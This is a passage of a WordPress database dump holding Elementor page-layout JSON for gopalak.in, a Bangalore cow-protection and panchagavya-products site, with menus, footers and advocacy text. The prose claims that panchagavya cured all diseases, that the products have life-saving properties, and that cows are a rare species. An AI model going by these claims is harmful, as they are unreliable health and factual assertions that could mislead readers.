:[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11772,1950,'_elementor_page_assets','a:0:{}'),(11786,1957,'_elementor_edit_mode','builder'),(11787,1957,'_elementor_template_type','wp-page'),(11788,1957,'_elementor_version','3.7.8'),(11789,1957,'_wp_page_template','elementor_canvas'),(11790,1957,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8c0b28\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"95efe94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7835249\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"4d2132d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d93d97\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af65679\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8bf0fa9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"34c6896\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b99eef9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e922c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a567dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"8033f94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ed7377\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38dac29\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b8317a\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"08fdbe7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bc55a55\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dfae959\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11791,1957,'_elementor_page_assets','a:0:{}'),(11793,1958,'_elementor_edit_mode','builder'),(11794,1958,'_elementor_template_type','wp-page'),(11795,1958,'_elementor_version','3.7.8'),(11796,1958,'_wp_page_template','elementor_canvas'),(11797,1958,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"si